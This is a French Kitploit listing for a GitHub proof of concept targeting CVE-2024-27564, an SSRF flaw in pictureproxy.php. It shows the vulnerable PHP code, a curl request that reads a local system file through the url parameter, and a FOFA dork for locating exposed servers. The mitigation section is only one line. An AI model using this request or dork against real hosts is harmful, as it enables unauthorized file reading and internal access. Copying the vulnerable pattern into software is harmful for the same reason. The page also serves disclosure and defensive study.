Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27564 — Exploit de preuve de concept pour CVE-2024-27564, une vulnérabilité de type forgerie de requête côté serveur (SSRF) dans pictureproxy.php permettant à des attaquants distants non authentifiés d'injecter des URL arbitraires via le paramètre url. | Kitploit
Outils/GitHubGitHub/chsxthwik/cve-2024-27564
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité Web
GitHubchsxthwik/cve-2024-27564

CVE-2024-27564

Exploit de preuve de concept pour CVE-2024-27564, une vulnérabilité de type forgerie de requête côté serveur (SSRF) dans pictureproxy.php permettant à des attaquants distants non authentifiés d'injecter des URL arbitraires via le paramètre url.

Voir le dépôt
1241il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-27564

Description:

Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.

Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient car la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est passée à la fonction file_get_contents(), qui récupère le contenu à partir de l'URL spécifiée. Cela peut mener à une SSRF.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Requête Curl:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Atténuation:

Une gestion appropriée de la validation des entrées est nécessaire.

Télécharger l’outil